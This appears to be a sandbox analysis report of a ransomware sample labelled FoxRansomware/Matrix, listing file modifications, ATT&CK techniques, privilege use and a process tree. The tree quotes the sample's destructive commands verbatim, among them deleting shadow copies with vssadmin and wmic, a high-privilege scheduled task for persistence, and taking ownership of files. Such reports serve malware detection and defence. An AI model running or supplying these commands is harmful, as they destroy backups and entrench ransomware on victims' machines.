File opened (read-only)	\??\U:	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened (read-only)	\??\G:	k5CUy3US64.exe
File opened (read-only)	\??\U:	k5CUy3US64.exe
File opened (read-only)	\??\L:	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened (read-only)	\??\V:	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened (read-only)	\??\O:	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened (read-only)	\??\K:	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened (read-only)	\??\H:	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened (read-only)	\??\G:	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened (read-only)	\??\L:	k5CUy3US64.exe
File opened (read-only)	\??\Y:	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
154	myexternalip.com

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-609813121-2907144057-1731107329-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\IkKc8Rcq.bmp"	reg.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.25\ru\PresentationFramework.resources.dll	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.0\PresentationFramework.Royale.dll	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\lib\images\cursors\win32_CopyNoDrop32x32.gif	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\legal\javafx\icu_web.md	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\FPA_f14\FA000000014	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\1033\ODBCMESSAGES.XML	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\Fonts\private\ARIALN.TTF	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.0\zh-Hant\System.Windows.Input.Manipulations.resources.dll	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\lib\psfont.properties.ja	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Standard2019VL_MAK_AE-ul-oob.xrm-ms	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\ClientSub_eula.txt	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN107.XML	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\Fonts\private\WINGDNG3.TTF	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\lib\sound.properties	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\lib\javafx-mx.jar	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\7-Zip\Lang\co.txt	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\index.win32.bundle	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\Microsoft Office\root\Office16\sdxs\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.25\it\PresentationCore.resources.dll	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\msvcp140_2.dll	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Standard2019VL_MAK_AE-pl.xrm-ms	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_Retail3-pl.xrm-ms	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTrial3-pl.xrm-ms	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Outlook2019R_Retail-ul-oob.xrm-ms	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\Microsoft.Build.Engine.dll	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.0\cs\PresentationCore.resources.dll	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File created	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.0\tr\#FOX_README#.rtf	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.0\zh-Hant\WindowsBase.resources.dll	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\106.0.5249.119\icudtl.dat	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Java\jre-1.8\legal\javafx\icu_web.md	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\7-Zip\Lang\el.txt	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.25\ja\System.Xaml.resources.dll	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.0\ja\Microsoft.VisualBasic.Forms.resources.dll	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Access2019R_Retail-ppd.xrm-ms	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN090.XML	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.OleDbProvider.dll	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected]	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\AXIS\AXIS.ELM	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000042\manifest.xml	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.0\System.Threading.Channels.dll	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Professional2019R_Grace-ppd.xrm-ms	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Office 2007 - 2010.xml	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\Bibliography\Author2XML.XSL	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioProCO365R_Subscription-ppd.xrm-ms	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\MSIPC\en-us\msipc.dll.mui	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\TellMeRuntime.dll	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\Cultures\OFFICE.ODF	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\ADDINS\PowerPivot Excel Add-in\en\LocalizedStrings.xml	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioStdXC2RVL_KMS_ClientC2R-ul-oob.xrm-ms	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\Csi.dll	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\Send2Fluent.White.png	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.25\mscorrc.dll	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\nio.dll	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\legal\jdk\lcms.md	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogo.contrast-white_scale-180.png	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.25\coreclr.dll	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Client\api-ms-win-crt-filesystem-l1-1-0.dll	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN048.XML	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.0\System.Design.dll	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\MSIPC\ko\msipc.dll.mui	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\serialver.exe	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\legal\javafx\mesa3d.md	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioProR_Trial-ppd.xrm-ms	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\CSS7DATA000A.DLL	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
1532	schtasks.exe

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

pid	Process
1212	vssadmin.exe

Suspicious behavior: EnumeratesProcesses 13 IoCs

pid	Process
1804	powershell.exe
1804	powershell.exe
1804	powershell.exe
5768	k5CUy3US64.exe
5768	k5CUy3US64.exe
5768	k5CUy3US64.exe
5768	k5CUy3US64.exe
5768	k5CUy3US64.exe
5768	k5CUy3US64.exe
5768	k5CUy3US64.exe
5768	k5CUy3US64.exe
5768	k5CUy3US64.exe
5768	k5CUy3US64.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
5768	k5CUy3US64.exe

Suspicious use of AdjustPrivilegeToken 49 IoCs

description	pid	Process
Token: SeDebugPrivilege	1804	powershell.exe
Token: SeTakeOwnershipPrivilege	5832	takeown.exe
Token: SeDebugPrivilege	5768	k5CUy3US64.exe
Token: SeLoadDriverPrivilege	5768	k5CUy3US64.exe
Token: SeBackupPrivilege	1352	vssvc.exe
Token: SeRestorePrivilege	1352	vssvc.exe
Token: SeAuditPrivilege	1352	vssvc.exe
Token: SeIncreaseQuotaPrivilege	4172	WMIC.exe
Token: SeSecurityPrivilege	4172	WMIC.exe
Token: SeTakeOwnershipPrivilege	4172	WMIC.exe
Token: SeLoadDriverPrivilege	4172	WMIC.exe
Token: SeSystemProfilePrivilege	4172	WMIC.exe
Token: SeSystemtimePrivilege	4172	WMIC.exe
Token: SeProfSingleProcessPrivilege	4172	WMIC.exe
Token: SeIncBasePriorityPrivilege	4172	WMIC.exe
Token: SeCreatePagefilePrivilege	4172	WMIC.exe
Token: SeBackupPrivilege	4172	WMIC.exe
Token: SeRestorePrivilege	4172	WMIC.exe
Token: SeShutdownPrivilege	4172	WMIC.exe
Token: SeDebugPrivilege	4172	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4172	WMIC.exe
Token: SeRemoteShutdownPrivilege	4172	WMIC.exe
Token: SeUndockPrivilege	4172	WMIC.exe
Token: SeManageVolumePrivilege	4172	WMIC.exe
Token: 33	4172	WMIC.exe
Token: 34	4172	WMIC.exe
Token: 35	4172	WMIC.exe
Token: 36	4172	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4172	WMIC.exe
Token: SeSecurityPrivilege	4172	WMIC.exe
Token: SeTakeOwnershipPrivilege	4172	WMIC.exe
Token: SeLoadDriverPrivilege	4172	WMIC.exe
Token: SeSystemProfilePrivilege	4172	WMIC.exe
Token: SeSystemtimePrivilege	4172	WMIC.exe
Token: SeProfSingleProcessPrivilege	4172	WMIC.exe
Token: SeIncBasePriorityPrivilege	4172	WMIC.exe
Token: SeCreatePagefilePrivilege	4172	WMIC.exe
Token: SeBackupPrivilege	4172	WMIC.exe
Token: SeRestorePrivilege	4172	WMIC.exe
Token: SeShutdownPrivilege	4172	WMIC.exe
Token: SeDebugPrivilege	4172	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4172	WMIC.exe
Token: SeRemoteShutdownPrivilege	4172	WMIC.exe
Token: SeUndockPrivilege	4172	WMIC.exe
Token: SeManageVolumePrivilege	4172	WMIC.exe
Token: 33	4172	WMIC.exe
Token: 34	4172	WMIC.exe
Token: 35	4172	WMIC.exe
Token: 36	4172	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2004 wrote to memory of 4592	2004	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe	88
PID 2004 wrote to memory of 4592	2004	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe	88
PID 2004 wrote to memory of 4592	2004	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe	88
PID 2004 wrote to memory of 4988	2004	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe	91
PID 2004 wrote to memory of 4988	2004	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe	91
PID 2004 wrote to memory of 4988	2004	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe	91
PID 2004 wrote to memory of 4768	2004	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe	98
PID 2004 wrote to memory of 4768	2004	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe	98
PID 2004 wrote to memory of 4768	2004	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe	98
PID 4768 wrote to memory of 1804	4768	cmd.exe	100
PID 4768 wrote to memory of 1804	4768	cmd.exe	100
PID 4768 wrote to memory of 1804	4768	cmd.exe	100
PID 2004 wrote to memory of 944	2004	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe	104
PID 2004 wrote to memory of 944	2004	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe	104
PID 2004 wrote to memory of 944	2004	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe	104
PID 2004 wrote to memory of 4288	2004	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe	105
PID 2004 wrote to memory of 4288	2004	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe	105
PID 2004 wrote to memory of 4288	2004	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe	105
PID 944 wrote to memory of 3244	944	cmd.exe	108
PID 944 wrote to memory of 3244	944	cmd.exe	108
PID 944 wrote to memory of 3244	944	cmd.exe	108
PID 4288 wrote to memory of 1288	4288	cmd.exe	109
PID 4288 wrote to memory of 1288	4288	cmd.exe	109
PID 4288 wrote to memory of 1288	4288	cmd.exe	109
PID 944 wrote to memory of 5812	944	cmd.exe	110
PID 944 wrote to memory of 5812	944	cmd.exe	110
PID 944 wrote to memory of 5812	944	cmd.exe	110
PID 944 wrote to memory of 5996	944	cmd.exe	111
PID 944 wrote to memory of 5996	944	cmd.exe	111
PID 944 wrote to memory of 5996	944	cmd.exe	111
PID 2004 wrote to memory of 5676	2004	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe	113
PID 2004 wrote to memory of 5676	2004	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe	113
PID 2004 wrote to memory of 5676	2004	91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe	113
PID 5676 wrote to memory of 5984	5676	cmd.exe	115
PID 5676 wrote to memory of 5984	5676	cmd.exe	115
PID 5676 wrote to memory of 5984	5676	cmd.exe	115
PID 5676 wrote to memory of 5212	5676	cmd.exe	116
PID 5676 wrote to memory of 5212	5676	cmd.exe	116
PID 5676 wrote to memory of 5212	5676	cmd.exe	116
PID 5676 wrote to memory of 5832	5676	cmd.exe	118
PID 5676 wrote to memory of 5832	5676	cmd.exe	118
PID 5676 wrote to memory of 5832	5676	cmd.exe	118
PID 5676 wrote to memory of 844	5676	cmd.exe	119
PID 5676 wrote to memory of 844	5676	cmd.exe	119
PID 5676 wrote to memory of 844	5676	cmd.exe	119
PID 844 wrote to memory of 396	844	cmd.exe	120
PID 844 wrote to memory of 396	844	cmd.exe	120
PID 844 wrote to memory of 396	844	cmd.exe	120
PID 396 wrote to memory of 5768	396	k5CUy3US.exe	121
PID 396 wrote to memory of 5768	396	k5CUy3US.exe	121
PID 1288 wrote to memory of 5804	1288	wscript.exe	122
PID 1288 wrote to memory of 5804	1288	wscript.exe	122
PID 1288 wrote to memory of 5804	1288	wscript.exe	122
PID 5804 wrote to memory of 1532	5804	cmd.exe	124
PID 5804 wrote to memory of 1532	5804	cmd.exe	124
PID 5804 wrote to memory of 1532	5804	cmd.exe	124
PID 1288 wrote to memory of 3672	1288	wscript.exe	125
PID 1288 wrote to memory of 3672	1288	wscript.exe	125
PID 1288 wrote to memory of 3672	1288	wscript.exe	125
PID 3672 wrote to memory of 5784	3672	cmd.exe	127
PID 3672 wrote to memory of 5784	3672	cmd.exe	127
PID 3672 wrote to memory of 5784	3672	cmd.exe	127
PID 5812 wrote to memory of 1212	5812	cmd.exe	130
PID 5812 wrote to memory of 1212	5812	cmd.exe	130

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
5984	attrib.exe

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe"
1⤵
- Matrix Ransomware
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:2004
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe" "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWB3LaOf.exe"
  2⤵
  PID:4592
- C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWB3LaOf.exe
  "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWB3LaOf.exe" -n
  2⤵
  - Executes dropped EXE
  PID:4988
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\X9DSNOeI.txt"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4768
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1804
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\IkKc8Rcq.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:944
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\IkKc8Rcq.bmp" /f
    3⤵
    - Sets desktop wallpaper using registry
    PID:3244
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f
    3⤵
    PID:5812
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
    3⤵
    PID:5996
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\6G9cJgYG.vbs"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4288
- - C:\Windows\SysWOW64\wscript.exe
    wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\6G9cJgYG.vbs"
    3⤵
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:1288
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\37TWMJXM.bat" /sc minute /mo 5 /RL HIGHEST /F
      4⤵
      Suspicious use of WriteProcessMemory
      PID:5804
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\37TWMJXM.bat" /sc minute /mo 5 /RL HIGHEST /F
        5⤵
        Creates scheduled task(s)
        
        PID:1532
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3672
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Run /I /tn DSHCA
        5⤵
        
        PID:5784
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\wuxDdps2.bat" "C:\ProgramData\USOPrivate\UpdateStore\store.db""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5676
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\ProgramData\USOPrivate\UpdateStore\store.db"
    3⤵
    - Views/modifies file attributes
    PID:5984
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOPrivate\UpdateStore\store.db" /E /G Admin:F /C
    3⤵
    PID:5212
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOPrivate\UpdateStore\store.db"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:5832
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c k5CUy3US.exe -accepteula "store.db" -nobanner
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:844
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\k5CUy3US.exe
      k5CUy3US.exe -accepteula "store.db" -nobanner
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:396
    - - C:\Users\Admin\AppData\Local\Temp\k5CUy3US64.exe
        
        k5CUy3US.exe -accepteula "store.db" -nobanner
        5⤵
        Drops file in Drivers directory
        Sets service image path in registry
        Executes dropped EXE
        Enumerates connected drives
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: LoadsDriver
        Suspicious use of AdjustPrivilegeToken
        
        PID:5768

C:\Windows\SYSTEM32\cmd.exe
C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\37TWMJXM.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:5812
- C:\Windows\system32\vssadmin.exe
  vssadmin Delete Shadows /All /Quiet
  2⤵
  - Interacts with shadow copies
  PID:1212
- C:\Windows\System32\Wbem\WMIC.exe
  wmic SHADOWCOPY DELETE
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4172

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1352

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

